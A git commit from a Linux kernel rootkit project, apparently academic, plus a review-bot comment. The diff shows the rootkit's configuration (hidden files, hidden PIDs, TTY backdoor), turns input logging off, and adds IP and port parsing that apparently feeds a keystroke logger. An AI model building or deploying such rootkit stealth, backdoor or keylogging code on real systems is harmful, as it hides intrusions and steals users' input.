linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 9c86f5862f27ce716fa454cb54e1347fdacb0248
parent 690697be6d8195bff6893781c68c73b43b62fd42
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 12 Dec 2020 02:21:22 +0100

adds initial socket string parsing

Diffstat:
Msrc/g7.c | 2+-
Msrc/inputlog.c | 18++++++++++++++++++
2 files changed, 19 insertions(+), 1 deletion(-)

diff --git a/src/g7.c b/src/g7.c
@@ -44,7 +44,7 @@ rootkit_t rootkit = {
 .hiding_files = true,
 .hiding_open = true,
 .hiding_pids = true,
- .logging_input = true,
+ .logging_input = false,
 .backdoor = BD_TTY,
 };
diff --git a/src/inputlog.c b/src/inputlog.c
@@ -1,9 +1,27 @@
+#include <linux/kernel.h>
+#include <linux/inet.h>
+
+#include "common.h"
 #include "inputlog.h"
+struct socket sock;
+
 void log_input(const char *ip, const char *port)
 {
+ size_t i;
+ u8 ip_quad[4];
+ unsigned long ip_ul;
+ unsigned long port_ul;
+
+ kstrtoul(port, 10, &port_ul);
+ in4_pton(ip, -1, ip_quad, -1, NULL);
+
+ ip_ul = 0;
+ for (i = 0; i < 4; ++i)
+ ip_ul += (ip_quad[i] & 0xFF) << (8 * i);
+ DEBUG_INFO("ip_s = %s, port_s = %s, ip: %lu, port: %lu\n", ip, port, ip_ul, port_ul);
 }
 void
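Review bot: The default of `.logging_input` in the g7.c hunk is flipped from true to false, but neither the commit message ("adds initial socket string parsing") nor the changed line records why, so a reader of g7.c cannot tell whether this is a temporary switch or the intended default. Since this flag presumably gates the `log_input()` path that the same commit extends in inputlog.c, the new parsing code looks unreachable unless something sets the flag at runtime; that is inferred from the names, not visible here. Suggest a trailing comment on the changed line, `.logging_input = false, /* off by default until inputlog.c's parsing is finished */`, or one sentence in the commit message stating the reason. The `rootkit` initializer begins outside the hunk.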